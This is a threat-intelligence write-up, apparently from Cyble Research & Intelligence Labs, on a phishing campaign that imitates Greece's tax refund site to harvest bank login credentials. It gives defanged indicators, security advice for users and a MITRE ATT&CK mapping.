During our routine threat-hunting exercise, Cyble Research & Intelligence Labs (CRIL) came across multiple URLs hosting pages pretending to be Greece’s tax refund site. The page mentions the tax refund amount and asks users to confirm their current account number to transfer funds. The page tricks users into providing their net banking credentials through this process.
Phishing Pages Analysis
The figure below shows the phishing site with the official logo of the Greek Government website.
When users visit the website hosted on the URLs: hxxp://mygov-refund[.]me/ret/tax & hxxps://govgr-tax[.]me/ret/tax, the pages ask the users to confirm their current account number to transfer tax refund money.
While choosing the bank, the user is given the option to choose between seven major banks, including the National Bank of Greece, Alpha Bank, and WinBank.
When the user selects the bank, the website redirects them to a page that contains a fake net banking login UI similar to the legitimate URLs being imitated.
The below image depicts the fake login UI hosted on the URL: hxxp://mygov-refund[.]me/bg/internet banking/tax pretending to be the National Bank of Greece’s net banking page.
The below image shows the fake login UI hosted on the URL: hxxp://mygov-refund[.]me/alpha/internet banking/tax, which pretends to be the Alpha Bank net banking page.
The below image shows the network communication after capturing any keystrokes entered on the phishing website’s text field.
Based on our investigation, CRIL observed that the IP address: 195.178.120[.]25 has been used as a base to host various malicious domains containing phishing pages related to tax refunds in Greece. The complete list of phishing sites can be found in the IOC section of this analysis.
Upon further investigation, we determined that this campaign started through phishing emails targeting Greek taxpayers.
Phishing has been one of the most commonly used tactics leveraged by Threat Actors to harvest personal and financial information. In this particular case, we observed the TAs using sophisticated techniques to steal whatever inputs were entered in the text fields of their phishing sites without the need for further user input (such as clicking “Submit”).
This is a rarely seen feature, as it can capture credentials with minimal inputs from the user, making the campaign even harder to detect and analyze.
Cyble Research & Intelligence Labs actively monitors new malicious phishing campaigns to keep our readers updated with our latest findings about phishing and other types of data theft attacks.
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:
- Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
- Regularly monitor your financial transactions, and if you notice any suspicious activity, contact your bank immediately.
- Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
MITRE ATT&CK® Techniques
|Tactic||Technique ID||Technique Name|
|Initial Access||T1190||Exploit Public-Facing Application|
|Input Capture||T1056/001||Input Capture: Keylogging|
Indicators of Compromise (IOCs)